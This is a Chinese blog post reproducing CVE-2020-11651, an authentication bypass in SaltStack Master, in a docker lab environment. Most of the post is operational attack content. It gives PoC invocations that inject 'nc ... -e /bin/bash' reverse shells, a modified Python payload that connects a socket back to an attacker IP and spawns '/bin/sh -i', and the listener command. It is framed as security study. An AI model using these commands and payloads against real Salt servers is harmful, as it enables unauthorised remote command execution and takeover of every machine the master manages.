美文网首页渗透测试WEB渗透与网络安全
CVE-2020-11651 水平权限绕过漏洞

CVE-2020-11651 水平权限绕过漏洞

作者: 半夜菊花茶 | 来源:发表于2020-05-06 20:41 被阅读0次

本文仅用于安全技术交流学习

SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。

在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。

参考链接:

漏洞环境

下载docker-compose.yml

执行如下命令启动一个SaltStack Master服务:

docker-compose up -d

环境启动后,将会在本地监听如下端口:

  • 4505/4506 这是SaltStack Master与minions通信的端口
  • 8000 这是Salt的API端口
  • 2222 这是容器内部的SSH服务器监听的端口

漏洞复现

首先获取PoC代码,需要python3的环境,先安装依赖包pip install salt

举例如下:

./cve-2020-11651.py 192.168.134.13 master 'nc 192.168.134.13 4444 -e "/bin/bash"'

./cve-2020-11651.py 192.168.134.13 minions 'nc 192.168.134.13 4444 -e "/bin/bash"'

./cve-2020-11651.py 192.168.134.13 fetchkeyonly

如果环境中没有nc,也可以修改PoC代码,使用python直接构造反弹shell。代码中的payload由

msg = {"key":root_key,
            "cmd":"runner",
            'fun': 'salt.cmd',
            "kwarg":{
                "fun":"cmd.exec_code",
                "lang":"python3",
                "code":"import subprocess;subprocess.call('{}',shell=True)".format(command)
                },
            'jid': '20200504042611133934',
            'user': 'sudo_user',
            '_stamp': '2020-05-04T04:26:13.609688'}

改为:

msg = {"key":root_key,
            "cmd":"runner",
            'fun': 'salt.cmd',
            "kwarg":{
                "fun":"cmd.exec_code",
                "lang":"python3",
                "code":"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.134.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"
                },
            'jid': '20200504042611133934',
            'user': 'sudo_user',
            '_stamp': '2020-05-04T04:26:13.609688'}

控制端开启nc接受反弹shell

nc -lvnp 4444
image.png

相关文章

  • CVE-2020-11651 水平权限绕过漏洞

    本文仅用于安全技术交流学习 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全...

  • web漏洞之越权

    # 水平越权实战 # 在一次渗透测试中遇到几个经典的水平越权漏洞,以及几个权限绕过。 ## 增加任意用户的购物车 ...

  • web安全及防御 - 逻辑错误漏洞 & 代码注入

    一、逻辑错误漏洞 常见的逻辑漏洞: 1. 绕过授权验证 (1)水平越权:相同级别(权限)的用户或者同一角色的不同用...

  • CVE-2017-12635

    Couchdb 垂直权限绕过漏洞(CVE-2017-12635) 1.漏洞影响版本 Apache CouchDB小...

  • FineCMS 任意用户登录

    发布时间:2016-08-08 公开时间:N/A 漏洞类型:权限绕过 危害等级:高 漏洞编号:xianzhi-20...

  • Alibaba Nacos权限认证绕过漏洞复现

    0x0****0****简介 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性...

  • 9.越权

    1、什么是越权a的权限小于b的权限,但是使用a用户的权限能够操作b用户的数据,叫做越权 2、越权漏洞分类水平越权和...

  • 什么是越狱、Cydia

    一、越狱越狱是指通过分析 iOS 系统的代码,找到 iOS 系统的漏洞,绕过系统的安全权限检查,最终获取系统 ro...

  • CVE-2020-11651 saltstack 认证绕过

    漏洞概述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 Sal...

  • CVE-2018-8715

    AppWeb认证绕过漏洞(CVE-2018-8715) 1.漏洞影响版本 AppWeb<7.0.3 2.漏洞危害 ...

网友评论

    本文标题:CVE-2020-11651 水平权限绕过漏洞

    本文链接:https://www.haomeiwen.com/subject/bmegghtx.html